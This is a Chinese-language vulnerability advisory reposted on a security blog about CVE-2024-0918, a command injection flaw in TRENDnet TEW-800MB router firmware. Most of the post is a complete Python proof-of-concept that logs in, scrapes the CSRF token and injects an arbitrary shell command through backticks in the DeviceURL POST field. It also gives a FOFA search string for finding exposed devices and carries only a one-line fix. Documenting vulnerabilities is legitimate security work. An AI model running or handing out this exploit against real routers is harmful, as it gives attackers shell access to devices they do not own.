CVE-2024-0918

admin 2024年2月17日19:09:37评论43 views字数 2184阅读7分16秒阅读模式

使

01 漏洞名称

TRENDnet TEW-800MB POST 请求操作系统命令注入漏洞

02 漏洞影响

TRENDnet TEW-800MB 1.0.1.0

03 漏洞描述

固件版本为1.0.1.0的TEW-800MB路由器存在命令注入漏洞。如果攻击者获得了web管理权限,他们可以将命令注入到httpd未知函数中的post请求参数DeviceURL中,从而获得shell权限。该漏洞可以在本地Intranet上执行,如果启用了远程管理,则可以远程执行。

代码分析

在未知函数中,参数DeviceURL可以被用户控制,存在命令注入漏洞按照DeviceURL的值,发现system()函数调用

CVE-2024-0918

环境设置:

CVE-2024-0918

环境配置请参考如下链接

https://github.com/pr0v3rbs/FirmAE

CVE-2024-0918

最终搭建好是这个样子

CVE-2024-0918

04 FOFA搜索语句

"TRENDnet-TEW"

CVE-2024-0918

05 poc

poc文件内容如下

import requestsimport base64 import re

if __name__ == '__main__':    print('start !!! ')

    target = input("Enter Target IP : ")    username = input("Enter Username : ")    password = input("Enter Password : ")    cmd = input("Enter you want cmd : ")    auth = username + ":" + password    hash = base64.b64encode(auth.encode('utf-8')).decode('utf-8')    s = requests.Session()

    headers = {        'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0",        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",        'Accept-Language': "en-US,en;q=0.5",        'Accept-Encoding': "gzip, deflate, br",        'Authorization': f'Basic {hash}',        'Connection': "close",        'Cookie': "expandable=6c",        'Upgrade-Insecure-Requests': "1"    }    response = s.request("GET", f'http://{target}/adm/management.asp', headers=headers)

    data = response.text

    token_pattern = r'name="token" value="([^"]+)"'    token_match = re.search(token_pattern, data)    if token_match:        token_value = token_match.group(1)    else:        token_value = "Token not found"        print(token_match)        exit



    burp0_url = "http://" + target + "/uapply.cgi"    burp0_headers = {        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',        'Accept-Language': 'en-US,en;q=0.5',        'Accept-Encoding': 'gzip, deflate, br',        'Content-Type': 'application/x-www-form-urlencoded',        'Authorization': f'Basic {hash}',        'Connection': 'close',        'Cookie': 'expandable=6c',        'Upgrade-Insecure-Requests': '1'    }

    # Form data to be sent in POST request    burp0_data = {        'page': '/adm/management.asp',        'token': f'{token_value}',        'DeviceURL': f'tew-800mb`{cmd}`',        'action': 'Apply',        'apply_do': 'setDeviceURL',    }    s.post(burp0_url, headers=burp0_headers, data=burp0_data)

    print("end !!! ")

CVE-2024-0918

命令注入成功

CVE-2024-0918

06 修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-0918

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日19:09:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-0918https://cn-sec.com/archives/2498728.html

发表评论

匿名网友 填写信息